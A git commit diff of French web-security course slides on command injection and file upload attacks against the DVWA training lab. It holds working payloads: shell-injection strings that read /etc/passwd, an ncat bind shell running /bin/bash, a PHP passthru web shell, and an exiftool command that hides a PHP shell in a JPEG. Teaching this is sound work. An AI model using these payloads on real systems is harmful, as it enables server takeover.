CMDi + Upload

09a45d20 · Vincent Mazenod · 465b889c · 09a45d20 · 09a45d20 · 09a45d20
Commit 09a45d20 authored 1 year ago by Vincent Mazenod
--- a/content/Etudiants/zz2-f5-websec.md
+++ b/content/Etudiants/zz2-f5-websec.md
@@ -21,8 +21,8 @@ Tags: cours
 * [Authentification](slides/1337/authentication.html)
 * [Command execution](slides/1337/cmdi.html)
    * [Shellshock](slides/1337/shellshock.html)
-* [Upload](slides/1337/upload.html)
 * [LFI_RFI](slides/1337/fi.html)
+* [Upload](slides/1337/upload.html)
 * [XSS](slides/1337/xss.html)
 * [CSRF](slides/1337/csrf.html)
 * [SQLi](slides/1337/sqli.html)

--- a/content/slides/1337/cmdi.html
+++ b/content/slides/1337/cmdi.html
@@ -7,11 +7,11 @@
    <title>CMDi</title>

    <link rel="stylesheet" href="../../node_modules/reveal.js/css/reveal.css">
-    <link rel="stylesheet" href="../../node_modules/reveal.js/css/theme/white.css">
+    <link rel="stylesheet" href="../../node_modules/reveal.js/css/theme/black.css">

    <!-- Theme used for syntax highlighting of code -->
    <link rel="stylesheet" href="../../node_modules/reveal.js/lib/css/zenburn.css">
-    <link rel="stylesheet" href="../../node_modules/font-awesome/css/font-awesome.min.css">
+    <link rel="stylesheet" href="../../node_modules/@fortawesome/fontawesome-free/css/all.min.css">
    <link rel="stylesheet" href="../main.css">

    <!-- Printing and PDF exports -->
@@ -35,7 +35,7 @@
      </div>
    </div>

-    <script src="../../node_modules/reveal.js/lib/js/head.min.js"></script>
+    <!-- script src="../../node_modules/reveal.js/lib/js/head.min.js"></script -->
    <script src="../../node_modules/reveal.js/js/reveal.js"></script>

    <script>

--- a/content/slides/1337/images/upload/content-type.png
+++ b/content/slides/1337/images/upload/content-type.png
--- a/content/slides/1337/images/upload/kitten.jpg
+++ b/content/slides/1337/images/upload/kitten.jpg
--- a/content/slides/1337/md/cmdi.md
+++ b/content/slides/1337/md/cmdi.md
@@ -3,23 +3,35 @@
 ## aka [command injection](https://www.owasp.org/index.php/Command_Injection)


-### [security low](http://dv.wa/vulnerabilities/exec/)
+### CMDi / security low
+
+* paramètres non filtrés
+  * la commande est écrite en dur
+    * exécution de commandes arbitraires sur le serveur
+    * exécutée avec les droits du serveur (thread)

-* exécution de commandes arbitraires sur le serveur
 * triviale mais assez rare


-### [security low](http://dv.wa/vulnerabilities/exec/)
+### CMDi / security low
+
+* Unix
+    * Pipeline 
+        * redirection la sortie standard: **|**
+        * redirection la sortie d'erreur: **|&**
+    * List
+        * séparateur de commande: **;** 
+        * arrière plan: **&** 
+        * et logique: **&&** 
+        * ou logique: **||** 

-* paramètre non filtré
-  * la commande est écrite en dur
-    * **&&**, **|** ou **;** permettent d'entamer une chaine d'instructions
-      * exécutée avec les droits du serveur (thread)
+
+### CMDi / security low

 ```shell
 localhost && ls
-localhost; whoami
-localhost| id
+; whoami
+localhost | id
 ```

 * le réseau est également explorable
@@ -40,18 +52,18 @@ Note:
        - DVWA Security -> medium


-### [security medium](http://dv.wa/vulnerabilities/exec/)
+### CMDi / security medium

 les chaînes de caractères "&&" et ";" sont interdites

 ```shell
 # Pour y voir plus clair
-1 | ls
+localhost | ls
 # Plus intéressant
-1 | pwd & whoami & ps
-1 | uname -a & users & id & w
-1 | cat /etc/group
-1 | cat /etc/passwd
+localhost | pwd & whoami & ps
+localhost | uname -a & users & id & w
+localhost | cat /etc/group
+localhost | cat /etc/passwd
 ```

 Note:
@@ -78,7 +90,16 @@ Note:
        - DVWA Security -> high


-### [security high](http://dv.wa/vulnerabilities/exec/)
+### CMDi / security high
+
+```shell
+localhost|ls
+```
+
+Note:
+-détailler l'expression régulière
+
+### CMDi / security impossible

 * l'approche est ici différente
    * on ne cherche plus à éliminer les caractères dangereux
@@ -94,16 +115,22 @@ Note:

 ## bind shell

+* ex netcat
+
+```shell
+sudo apt install ncat
+```
+
 * injecter

 ```shell
-1 | netcat -v -e '/bin/bash' -l -p 1337
+1 | ncat -v -e '/bin/bash' -l -p 8080
 ```

 * puis sur le terminal de l'attaquant

 ```shell
-netcat -v dv.wa 1337
+ncat -v vm-etu-vimazeno.local.isima.fr 8080
 ```

 * \o/ nous disposons d'un accès distant à la machine

--- a/content/slides/1337/md/upload.md
+++ b/content/slides/1337/md/upload.md
@@ -29,114 +29,130 @@ Note:
 - pas d'upload ... FTP, WebDav (utilise les verbs HTTP)


-### [security low](http://dv.wa/vulnerabilities/upload/)
+## Upload / low

-Upload d'un fichier bd.php simple
-
-```php
-echo passthru($_REQUEST['cmd'])
 ```
-
-```php
-print_r($&lowbar;FILES);
-/*
- * ici 2 fichiers uploadés
- */
-array(1) {
-    ["uploaded"]=>array(2) {
-        ["name"]=>array(2) {
-            [0]=>string(9)"file0.txt"
-            [1]=>string(9)"file1.txt"
-        }
-        ["type"]=>array(2) {
-            [0]=>string(10)"text/plain"
-            [1]=>string(10)"text/html"
-        }
-    }
-}
+sudo chown -R www-data /var/www/DVWA/hackable/uploads
 ```

+Upload d'un fichier bd.php simple

-### [security low](http://dv.wa/vulnerabilities/upload/)
+```php
+<?php
+echo passthru($_REQUEST['cmd']);
+```

 * Trouver le répertoire d'upload
  * chemins connus dans produits connus
  * code source HTML faisant référence au fichier uploadé

-[http://dv.wa/hackable/uploads/bd.php](http://dv.wa/hackable/uploads/bd.php)
+```
+../../hackable/uploads/bd.php succesfully uploaded!
+```


-### [security medium](http://dv.wa/vulnerabilities/upload/)
+## Upload / $_FILES
+
+```
+cd /var/www/DVWA/vulnerabilities/upload/
+vi source/low.php
+```

 ```php
-$_FILES['uploaded']['type']
+print_r($_FILES);
+
+Array ( 
+    [uploaded] => Array ( 
+        [name] => bd.php 
+        [type] => application/x-php 
+        [tmp_name] => /tmp/phpPU0gay 
+        [error] => 0 
+        [size] => 39 
+    ) 
+)
 ```

-* Filtrer par type mime
-  * déduit de l'entête HTTP *Content-Type* de la requête HTTP envoyant le fichier
-    * fakable

-  * [<small>mime_content_type</small>](http://php.net/manual/fr/function.mime-content-type.php)
-  * [<small>exif_imagetype</small>](http://php.net/manual/fr/function.exif-imagetype.php)
-  * [<small>finfo_file</small>](http://php.net/manual/fr/function.finfo-file.php)
-  * [<small>getimagesize</small>](http://php.net/manual/fr/function.getimagesize.php)
+## Upload / security medium

+* contrôle de l'entête HTTP *Content-Type* renvoyé par le navigateur

-### [security medium](http://dv.wa/vulnerabilities/upload/)
+![content-type](images/upload/content-type.png "content-type")

-bd.php

-```php
-echo passthru($_REQUEST['cmd'])
+## Upload / security high
+
+![kitten](images/upload/kitten.jpg "kitten")<!-- .element style="width: 120px" -->
+
+* visionner le "Comment" du jpg avec [exiftool](http://www.sno.phy.queensu.ca/~phil/exiftool/) + [<i class="fa fa-gift"></i>](http://www.gamergen.com/actualites/insolites-hacker-arrete-pour-poitrine-copine-93809-1)
+
+* modifier le champs comment with exiftool
+
+```
+exiftool ~/Downloads/kitten.jpg \
+  -comment="<?php echo passthru(\$_REQUEST['cmd']); __halt_compiler();?>"
 ```

-| <small>Command</small>                     | <small>Output</small>             |   
-| --------------------------- |:------------------:|
-| <small>$_FILES['uploaded']['type']</small> | <small>application/x-php</small>  |   
-| <small>mime_content_type</small>           | <small>text/x-php</small>         |   
-| <small>exif_imagetype</small>              | <small>null (no image)</small>    |
-| <small>finfo_file</small>                  | <small>text/x-php</small>         |
-| <small>getimagesize[2]</small>             | <small>null (no image)</small>    |
+Code uploadé :)


-### [security medium](http://dv.wa/vulnerabilities/upload/)
+## Upload / security high

-<small style="float: left">[lego.jpeg](images/upload/lego.jpeg)</small>
+code non exécuté :(

-[![lego](images/upload/lego.jpeg "lego")<!-- .element style="width: 50px" -->](images/upload/lego.jpeg)
+on doit passer par une autre vulnérabilité 

-| <small>Command</small>                     | <small>Output</small>             |   
-| --------------------------- |:------------------:|
-| <small>$_FILES['uploaded']['type'] | <small>image/jpeg         |
-| <small>mime_content_type           | <small>image/jpeg         |
-| <small>exif_imagetype              | <small>2 (IMAGETYPE_JPEG) |
-| <small>finfo_file                  | <small>image/jpeg         |
-| <small>getimagesize[2]             | <small>image/jpeg         |
-<!-- .element class="table-striped table-bordered table-hover" style="width: 100%" -->
+* [CMDi](cmdi.html) pour renommer `kitten.jpg` en `kitten.php`
+* [LFI](fi.html) pour inclure la payload contenu dans `kitten.jpg`

+ou `cp kitten.jpg kitten.php` ;)

-### [security medium](http://dv.wa/vulnerabilities/upload/)

-* [kitten.jpg.php](images/upload/kitten.jpg.php)
+## Upload / autres contrôles

-![kitten](images/upload/kitten.jpg "kitten")<!-- .element style="width: 250px" -->
+db.php

-* visionner le "Comment" du jpg avec [exiftool](http://www.sno.phy.queensu.ca/~phil/exiftool/) + [<i class="fa fa-gift"></i>](http://www.gamergen.com/actualites/insolites-hacker-arrete-pour-poitrine-copine-93809-1)
+```php
+echo passthru($_REQUEST['cmd'])
+```

+| <small>Command</small>                                                                        | <small>Output</small>             |   
+| --------------------------------------------------------------------------------------------- |:---------------------------------:|
+| <small>$_FILES['uploaded']['type']</small>                                                    | <small>application/x-php</small>  |   
+| [<small>mime_content_type</small>](http://php.net/manual/fr/function.mime-content-type.php)   | <small>text/x-php</small>         |   
+| [<small>exif_imagetype</small>](http://php.net/manual/fr/function.exif-imagetype.php)         | <small>null (no image)</small>    |
+| [<small>finfo_file</small>](http://php.net/manual/fr/function.finfo-file.php)                 | <small>text/x-php</small>         |
+| [<small>getimagesize[2]</small>](http://php.net/manual/fr/function.getimagesize.php)          | <small>null (no image)</small>    |
+<!-- .element class="table-striped table-bordered table-hover" style="width: 100%" -->

-### [security medium](http://dv.wa/vulnerabilities/upload/)

-<small style="float: left">[kitten.jpg.php](images/upload/kitten.jpg.php)</small>
+## Upload / autres contrôles
+
+[![lego](images/upload/lego.jpeg "lego")<!-- .element style="width: 50px" -->](images/upload/lego.jpeg)
+<small>[lego.jpeg](images/upload/lego.jpeg)</small>
+
+| <small>Command</small>                                                                        | <small>Output</small>     |
+| --------------------------------------------------------------------------------------------- |:-------------------------:|
+| <small>$_FILES['uploaded']['type']</small>                                                    | <small>image/jpeg</small> |
+| [<small>mime_content_type</small>](http://php.net/manual/fr/function.mime-content-type.php)   | <small>image/jpeg</small> |
+| [<small>exif_imagetype</small>](http://php.net/manual/fr/function.exif-imagetype.php)         | <small>2 (IMAGETYPE_JPEG) |
+| [<small>finfo_file</small>](http://php.net/manual/fr/function.finfo-file.php)                 | <small>image/jpeg         |
+| [<small>getimagesize[2]</small>](http://php.net/manual/fr/function.getimagesize.php)          | <small>image/jpeg         |
+<!-- .element class="table-striped table-bordered table-hover" style="width: 100%" -->

-![kitten](images/upload/kitten.jpg "kitten")<!-- .element style="width: 50px" -->

-| <small>Command</small>                     | <small>Output</small>             |   
-| --------------------------- |:------------------:|
-| <small>$_FILES['uploaded']['type']</small> | <small>application/x-php</small>  |
-| <small>mime_content_type</small>           | <small>image/jpeg</small>         |
-| <small>exif_imagetype</small>              | <small>2 (IMAGETYPE_JPEG)</small> |
-| <small>finfo_file</small>                  | <small>image/jpeg</small>         |
-| <small>getimagesize[2]</small>             | <small>null (no image)</small>    |
+## Upload / autres contrôles
+
+![kitten](images/upload/kitten.jpg "kitten")<!-- .element style="width: 50px" -->
+<small>[kitten.jpg.php](images/upload/kitten.jpg.php)</small>
+
+| <small>Command</small>                                                                       | <small>Output</small>             |   
+| -------------------------------------------------------------------------------------------- |:---------------------------------:|
+| <small>$_FILES['uploaded']['type']</small>                                                   | <small>application/x-php</small>  |
+| [<small>mime_content_type</small>](http://php.net/manual/fr/function.mime-content-type.php)  | <small>image/jpeg</small>         |
+| [<small>exif_imagetype</small>](http://php.net/manual/fr/function.exif-imagetype.php)        | <small>2 (IMAGETYPE_JPEG)</small> |
+| [<small>finfo_file</small>](http://php.net/manual/fr/function.finfo-file.php)                | <small>image/jpeg</small>         |
+| [<small>getimagesize[2]</small>](http://php.net/manual/fr/function.getimagesize.php)         | <small>null (no image)</small>    |
 <!-- .element class="table-striped table-bordered table-hover" style="width: 100%" -->

 Note:
@@ -188,10 +204,11 @@ deny from all

 * Utiliser PHP pour lire les fichier avec [readfile](http://php.net/manual/fr/function.readfile.php)
  * prendre en charge la génération des en-têtes **Content-Type** "manuellement"
+    * [<i class="fa fa-github"></i> igorw/IgorwFileServeBundle](https://github.com/igorw/IgorwFileServeBundle)
    * [download center lite](http://www.stadtaus.com/fr/php_scripts/download_center_lite/)
      * permet une meilleure gestion des accès par permission
        * accès à la session courante
-    * [<i class="fa fa-github"></i> igorw/IgorwFileServeBundle](https://github.com/igorw/IgorwFileServeBundle)
+    

 Note:
 - attention toute la stack Sf2 à chaque image ou asset c'est chaud
--- a/content/slides/1337/upload.html
+++ b/content/slides/1337/upload.html
@@ -7,11 +7,11 @@
    <title>Upload</title>

    <link rel="stylesheet" href="../../node_modules/reveal.js/css/reveal.css">
-    <link rel="stylesheet" href="../../node_modules/reveal.js/css/theme/white.css">
+    <link rel="stylesheet" href="../../node_modules/reveal.js/css/theme/black.css">

    <!-- Theme used for syntax highlighting of code -->
    <link rel="stylesheet" href="../../node_modules/reveal.js/lib/css/zenburn.css">
-    <link rel="stylesheet" href="../../node_modules/font-awesome/css/font-awesome.min.css">
+    <link rel="stylesheet" href="../../node_modules/@fortawesome/fontawesome-free/css/all.min.css">
    <link rel="stylesheet" href="../main.css">

    <!-- Printing and PDF exports -->
@@ -35,7 +35,7 @@
      </div>
    </div>

-    <script src="../../node_modules/reveal.js/lib/js/head.min.js"></script>
+    <!-- script src="../../node_modules/reveal.js/lib/js/head.min.js"></script -->
    <script src="../../node_modules/reveal.js/js/reveal.js"></script>

    <script>